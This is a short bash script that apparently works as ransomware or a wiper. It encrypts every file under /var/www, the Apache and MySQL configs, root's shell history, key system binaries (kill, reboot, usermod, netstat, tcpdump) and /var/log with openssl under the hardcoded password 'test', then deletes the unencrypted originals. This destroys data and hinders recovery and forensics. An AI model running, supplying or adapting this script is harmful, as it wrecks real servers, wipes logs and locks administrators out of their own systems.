#!/bin/bash

folder=('/var/www/' '/etc/apache2' '/etc/mysql' '/root/.history' '/root/.bashrc' '/root/.bash_history' '/bin/kill' '/bin/pkill' '/bin/killall' '/bin/mount' '/sbin/reboot' '/sbin/shutdown' '/usr/sbin/usermod' '/usr/sbin/userdel' '/bin/netstat' '/usr/sbin/tcpdump' '/var/log')

for i in ${folder[@]}
do
#echo $i
grep -r $i -e "" --include=\* -l | tr '\n' '\0' | xargs -P 10 -I FILE -0 openssl enc -aes-256-cbc -salt -pass pass:test -in FILE -out FILE.enc 2>/dev/null
grep -r $i -e "" --exclude=\*.enc -l |tr '\n' '\0' | xargs -0 rm -rf FILE
done